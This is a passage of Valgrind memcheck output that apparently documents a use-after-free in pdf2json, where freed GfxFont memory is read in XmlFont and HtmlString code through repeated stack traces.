Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 4 ==22556== at 0x41CA4E: GString::getLength() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C320: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x40644C: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:89) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2af50 is 0 bytes inside a block of size 16 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46947A: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x468F7E: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 8 ==22556== at 0x409098: GString::getCString() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C354: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x40644C: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:89) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2af58 is 8 bytes inside a block of size 16 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46947A: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x468F7E: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 8 ==22556== at 0x4C326C8: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C36D: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x40644C: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:89) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2afa0 is 0 bytes inside a block of size 16 free'd ==22556== at 0x4C2F74B: operator delete[](void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C698: GString::~GString() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x469472: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E80F: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48E420: GString::resize(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C1C7: GString::GString(char const*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x468F8C: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 2 ==22556== at 0x4C32720: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C36D: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x40644C: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:89) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2afa8 is 8 bytes inside a block of size 16 free'd ==22556== at 0x4C2F74B: operator delete[](void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C698: GString::~GString() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x469472: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E80F: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48E420: GString::resize(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C1C7: GString::GString(char const*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x468F8C: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 1 ==22556== at 0x4C32758: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C36D: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x40644C: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:89) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2afac is 12 bytes inside a block of size 16 free'd ==22556== at 0x4C2F74B: operator delete[](void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C698: GString::~GString() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x469472: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E80F: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48E420: GString::resize(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C1C7: GString::GString(char const*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x468F8C: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 8 ==22556== at 0x4064E9: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:106) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2af58 is 8 bytes inside a block of size 16 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46947A: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x468F7E: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 1 ==22556== at 0x577A570: __strcmp_sse2_unaligned (strcmp-sse2-unaligned.S:24) ==22556== by 0x406516: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:110) ==22556== by 